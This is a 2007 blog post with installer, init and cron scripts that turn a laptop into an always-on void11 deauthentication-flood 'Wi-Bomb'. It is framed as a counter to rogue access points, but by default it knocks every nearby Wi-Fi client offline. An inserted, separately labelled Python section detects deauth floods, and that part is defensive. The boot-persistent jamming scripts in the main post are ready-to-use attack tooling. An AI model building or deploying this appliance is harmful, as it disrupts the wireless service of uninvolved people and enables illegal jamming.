Friday, May 4, 2007

Creating a Void11 Counter-Offensive Wi-Bomb on Auditor

Requirements:

  • Auditor ISO (http://mirror.switch.ch/ftp/mirror/auditor/ )
  • Laptop with available hard-drive for installation. Recommend 256+ MB RAM and P4 or better CPU. Must have PCMCIA slot. On-board NIC for external connectivity and management if desired.
  • SMC 2532W-B Intersil Prism-based WiFi card. Also has external antennae jacks.
  • 9dBi omni- or dual semi-directional patch antennas

Boot up Auditor and perform a permanent installation to the hard drive. Create the files listed under "Scripts" below on the system, then run the installer script. Test by executing '/etc/init.d/void11 start' with the SMC card inserted. Reboot and verify operation with a test "rogue" AP and an independent client attempting to connect. This is best done by letting the client associate and start a perpetual ping, then switching on the Wi-bomb appliance and watching the ping die.

You can later integrate known-good access points into the appliance by creating a matchlist and adjusting the OPTIONS parameter in the 'void11' script to include "-l /path/to/matchlist". See William Hidalgo's excellent writeup for more information on formatting the matchlist file.
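The acceptance test above (client pinging, appliance switched on, ping dies) is what a deauthentication flood looks like from the air, and it is also how a wireless IDS recognises one. The following is an added example from the detection side; it is not part of the original post or of void11. It decodes the 802.11 management-frame header, counts deauthentication and disassociation frames per BSSID in fixed time windows, and flags any BSSID whose rate crosses a threshold, reporting whether the frames were broadcast and which reason codes were used. The capture is constructed inline as stand-in data, and the window and threshold values are assumptions to tune for a real network.

```python
"""Detect a deauthentication flood from captured 802.11 management frames.

Added example, not code from the original post or from void11. The frames
are constructed in-line to stand in for a capture; window and threshold
are assumed values.
"""
import struct
from collections import defaultdict

SUBTYPE_DISASSOC = 0x0A   # management subtype 10
SUBTYPE_DEAUTH = 0x0C     # management subtype 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw):
    """Format six raw bytes as a colon-separated MAC address."""
    return ":".join("%02x" % b for b in raw)


def parse_mgmt_frame(frame):
    """Decode the MAC header of an 802.11 management frame.

    Returns a dict with subtype, da, sa, bssid and (for deauth/disassoc)
    the reason code, or None when the frame is not a management frame.
    """
    if len(frame) < 24:
        return None
    fc0 = frame[0]                       # first frame-control octet
    ftype = (fc0 >> 2) & 0x3             # bits 2-3: 0 = management
    subtype = (fc0 >> 4) & 0xF           # bits 4-7: subtype
    if ftype != 0:
        return None
    info = {
        "subtype": subtype,
        "da": mac_str(frame[4:10]),      # address 1: destination
        "sa": mac_str(frame[10:16]),     # address 2: source
        "bssid": mac_str(frame[16:22]),  # address 3: BSSID
        "reason": None,
    }
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH) and len(frame) >= 26:
        info["reason"] = struct.unpack("<H", frame[24:26])[0]  # little-endian
    return info


def detect_deauth_flood(captured, window=1.0, threshold=20):
    """Flag BSSIDs whose deauth/disassoc count in any window reaches threshold.

    `captured` is an iterable of (timestamp_seconds, frame_bytes).
    Returns {bssid: {"peak": n, "broadcast": bool, "reasons": {code: count}}}.
    """
    per_bucket = defaultdict(lambda: defaultdict(int))  # bssid -> bucket -> count
    broadcast = defaultdict(bool)
    reasons = defaultdict(lambda: defaultdict(int))
    for ts, frame in captured:
        info = parse_mgmt_frame(frame)
        if not info or info["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        per_bucket[info["bssid"]][int(ts // window)] += 1
        if info["da"] == BROADCAST:
            broadcast[info["bssid"]] = True
        reasons[info["bssid"]][info["reason"]] += 1
    alerts = {}
    for bssid, buckets in per_bucket.items():
        peak = max(buckets.values())
        if peak >= threshold:
            alerts[bssid] = {"peak": peak, "broadcast": broadcast[bssid],
                             "reasons": dict(reasons[bssid])}
    return alerts


def build_mgmt_frame(subtype, da, sa, bssid, reason=None):
    """Assemble a minimal management frame header (constructed test input only)."""
    hdr = bytes([subtype << 4, 0x00])            # frame control: type 0, subtype
    hdr += b"\x00\x00"                           # duration
    for addr in (da, sa, bssid):
        hdr += bytes(int(x, 16) for x in addr.split(":"))
    hdr += b"\x00\x00"                           # sequence control
    if reason is not None:
        hdr += struct.pack("<H", reason)         # deauth/disassoc reason code
    return hdr


def sample_capture():
    """Constructed capture: a quiet AP plus one BSSID under a deauth flood."""
    good_ap = "00:11:22:33:44:55"
    hit_ap = "66:77:88:99:aa:bb"
    client = "de:ad:be:ef:00:01"
    frames = [
        # one ordinary deauth from the good AP, then a beacon (subtype 8) as noise
        (0.10, build_mgmt_frame(SUBTYPE_DEAUTH, client, good_ap, good_ap, 3)),
        (0.20, build_mgmt_frame(0x08, BROADCAST, good_ap, good_ap)),
    ]
    # 30 broadcast deauths carrying the hit AP's BSSID within one second
    for i in range(30):
        frames.append((1.0 + i * 0.03,
                       build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, hit_ap, hit_ap, 7)))
    return frames


if __name__ == "__main__":
    for bssid, d in detect_deauth_flood(sample_capture()).items():
        print("deauth flood on BSSID %s: peak %d per window, broadcast=%s, reasons=%s"
              % (bssid, d["peak"], d["broadcast"], d["reasons"]))
```

Run as-is it reports the flooded BSSID only; the single deauth from the quiet AP stays below the threshold. A real deployment would feed frames from a monitor-mode capture and would suppress alerts for deauths genuinely sourced by APs on the same known-good inventory that the matchlist above is built from.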

References:

William Hidalgo's well-written article on using Void11 as a counter-offensive tool to protect networks: "Void11 Rouge Access Point Counter Offense" (http://remote-exploit.org/research/void11rougeaccesspoint.html )

Scripts:

void11_installer.sh

#!/bin/sh
# Installs the void11 init script, the daily cron restart and the boot/shutdown
# symlinks. Run it from the directory holding the 'void11' and 'void11.cron'
# files listed below.
cp -f void11 /etc/init.d/
chmod 755 /etc/init.d/void11
cp -f void11.cron /etc/cron.daily/void11
chmod 755 /etc/cron.daily/void11
# -f lets the installer be re-run without failing on links that already exist
ln -sf /etc/init.d/sysklogd /etc/rc.boot/S65syslog
ln -sf /etc/init.d/void11 /etc/rc.boot/S99void11
ln -sf /etc/init.d/void11 /etc/rc6.d/K15void11
ln -sf /etc/init.d/void11 /etc/rc0.d/K15void11
ln -sf /etc/init.d/sysklogd /etc/rc0.d/K10syslog
# The original listed the rc0.d line twice; rc6.d is assumed to be the intended
# partner, matching the K15void11 pair above.
ln -sf /etc/init.d/sysklogd /etc/rc6.d/K10syslog
# Log file is readable by root only
touch /var/log/void11
chmod 600 /var/log/void11
echo "Now that installation is complete, run Void11 by issuing"
echo
echo "/etc/init.d/sysklogd start"
echo "/etc/init.d/void11 start"

voider.sh

#!/bin/sh
# Manual (foreground) version of the start sequence used by the init script.
#rm -Rf /etc/pcmcia
#cp -R /etc/pcmcia-hostap /etc/pcmcia
# Drop the wlan-ng PCMCIA bindings so the card comes up under hostap instead
rm -f /etc/pcmcia/wlan-ng*
killall -HUP cardmgr
# Re-seat the card so cardmgr re-reads the bindings
cardctl eject
sleep 1
cardctl insert
sleep 2
# Put the Prism card into hostap master mode
iwpriv wlan0 hostapd 1
iwconfig wlan0 mode master
sleep 1
# Channel hopper in the background, penetration in the foreground
void11_hopper > /dev/null &
void11_penetration -t 1 -d 10 wlan0

void11.cron

#!/bin/sh
# Daily restart from /etc/cron.daily; does nothing if the binaries are absent.
test -x /usr/local/bin/void11_hopper || exit 0
test -x /usr/local/bin/void11_penetration || exit 0
/etc/init.d/void11 restart

void11

#!/bin/sh
# /etc/init.d/void11 - start/stop script for the void11 appliance

PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin

# Arguments passed to void11_penetration; add "-l /path/to/matchlist" here to
# exempt known-good access points
OPTIONS="-t 1 -d 10 wlan0"

# PID files are declared but not used: stop) relies on killall by process name
PIDFILE=/var/run/void11_penetration.pid
RIDFILE=/var/run/void11_hopper.pid
DAEMON=/usr/local/bin/void11_penetration
RAEMON=/usr/local/bin/void11_hopper

case "$1" in
  start)
    echo -n "Starting WiFi blackout service: void11"

    if [ ! -x "$RAEMON" ]; then
      echo "void11_hopper script missing - not starting"
      exit 1
    fi
    if [ ! -x "$DAEMON" ]; then
      echo "void11_penetration binary missing - not starting"
      exit 1
    fi
    # Same card bring-up as voider.sh: drop wlan-ng bindings, re-seat the card,
    # switch the Prism card to hostap master mode
    rm -f /etc/pcmcia/wlan-ng*
    killall -HUP cardmgr
    cardctl eject
    sleep 1
    cardctl insert
    sleep 2
    iwpriv wlan0 hostapd 1
    iwconfig wlan0 mode master
    sleep 1
    # Hopper output is discarded; penetration output goes to the log. Note the
    # single '>' truncates the log on every (re)start, including the daily cron
    # restart; use '>>' if the history should be kept.
    $RAEMON > /dev/null &
    $DAEMON $OPTIONS > /var/log/void11 &
    echo "."
    ;;

  stop)
    echo -n "Stopping WiFi blackout service: void11"
    killall void11_penetration
    sleep 2
    killall void11_hopper
    sleep 2
    echo "."
    ;;

  reload)
    $0 restart
    ;;

  restart|force-reload)
    $0 stop
    sleep 2
    $0 start
    ;;

  *)
    echo "Usage: /etc/init.d/void11 {start|stop|reload|restart|force-reload}" >&2
    exit 1
    ;;
esac

exit 0